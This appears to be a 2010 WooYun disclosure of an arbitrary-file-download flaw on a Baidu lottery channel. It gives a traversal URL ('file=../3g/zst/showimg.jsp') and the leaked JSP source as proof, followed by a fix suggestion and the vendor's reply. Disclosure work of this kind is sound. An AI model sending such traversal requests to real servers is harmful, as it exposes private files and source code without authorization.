当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2010-0323

漏洞标题:百度某频道存在下载任意文件漏洞

相关厂商:百度

漏洞作者: Jannock

提交时间:2010-08-26 23:55

修复时间:2010-09-26 03:00

公开时间:2010-09-26 03:00

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2010-08-26: 细节已通知厂商并且等待厂商处理中
2010-08-27: 厂商已经确认,细节仅向厂商公开
2010-09-06: 细节向核心白帽子及相关领域专家公开
2010-09-16: 细节向普通白帽子公开
2010-09-26: 细节向实习白帽子公开
2010-09-26: 细节向公众公开

简要描述:

百度某频道存在下载任意文件漏洞

详细说明:

下载图片处没有对文件类型后辍作判断,造成下载任意文件漏洞。
测试:
http://cp.baidu.com/downAction.do?file=../3g/zst/showimg.jsp

漏洞证明:

<[email protected] import="com.starlott.dyjnews.util.IMGKeyValue"%>
<%@ page language="java" import="java.text.SimpleDateFormat,java.util.Date" contentType="text/html; charset=utf-8"%>
<%@ include file="/3g/common/taglibs.jsp"%>
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link href="/3g/css/common.css" rel="stylesheet" type="text/css"/>
<title>走势图表</title>
</head>
<body>
<c:set var="flag" value="${fn:split(param.p,'/')[0]}" scope="page"></c:set>
<c:if test="${flag == 'ssq' }">
<c:set var="code" value="FCQGSSQ"/>
<c:set var="buyUrl" value="/3g/lott.do?code=FCQGSSQ"/>
</c:if>
<c:if test="${flag == 'lt' }">
<c:set var="code" value="SHTCDLT"/>
<c:set var="buyUrl" value="/3g/lott.do?code=FCQGSSQ"/>
</c:if>
<c:if test="${flag == 'p3' }">
<c:set var="code" value="SHTCP3"/>
<c:set var="buyUrl" value="/3g/lott.do?code=SHTCP3"/>
</c:if>
<c:if test="${flag == '3d' }">
<c:set var="code" value="FCQG3D"/>
<c:set var="buyUrl" value="/3g/lott.do?code=FCQG3D"/>
</c:if>
<c:if test="${flag == '11x5' }">
<c:set var="code" value="TCJXDLC"/>
<c:set var="buyUrl" value="/3g/lott.do?code=TCJXDLC"/>
</c:if>
<c:if test="${flag == 'TCCQKL123' }">
<c:set var="code" value="TCCQKL123"/>
<c:set var="buyUrl" value="/3g/lott.do?code=TCCQKL123"/>
</c:if>
<c:if test="${flag == 'ssc' }">
<c:set var="code" value="FCCQSSC"/>
<c:set var="buyUrl" value="/3g/lott.do?code=FCCQSSC"/>
</c:if>
<c:if test="${flag == 'ssl' }">
<c:set var="code" value="FCSHSSL"/>
<c:set var="buyUrl" value="/3g/lott.do?code=FCSHSSL"/>
</c:if>
<c:if test="${flag == 'sfc' }">
<c:set var="code" value="SHTCSFC"/>
<c:set var="buyUrl" value="/3g/lott.do?code=SHTCSFC"/>
</c:if>
<c:set var="tname" value="${param.p}" scope="page"></c:set>
<c:set var="typename" value="${code=='FCQGSSQ'?'双色球':code=='SHTCDLT'?'大乐透':code=='SHTCP3'?'排列三':code=='FCSHSSL'?'时时乐':code=='FCQG3D'?'福彩3D':code=='FCCQSSC'?'时时彩':code=='TCJXDLC'?'11选5':'双色球'}"></c:set>
<div class="dg"><a sendreferer="true" href="/3g/index.do">首页</a>&gt;&gt;<a sendreferer="true" href="/3g/zst/index.jsp">图表中心</a>&gt;&gt;${typename}走势图表<br/></div>
<[email protected] file="/3g/common/inc/header.jsp"%>
<div class="lmc">
<strong><%=IMGKeyValue.getName(request.getParameter("p"))%></strong><br/>
<img alt="" src="/imges/${param.p}"/><br/>
<a sendreferer="true" href="/downAction.do?file=${param.p }">下载</a><br/><br/>
<a sendreferer="true" href="/3g/lott.do?code=${code }">购买${typename}</a><br/>
<a sendreferer="true" href="/3g/zst/${flag}.jsp">${typename }图表中心</a><br/>
</div>
<[email protected] file="/3g/common/inc/footer.jsp"%>

修复方案:

对文件类型后辍作判断

版权声明:转载请注明来源 Jannock@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2010-08-27 10:52

厂商回复:

感谢,我们会通知第三方进行修复。
由于不是百度服务器,因此危害等级为中

最新状态:

暂无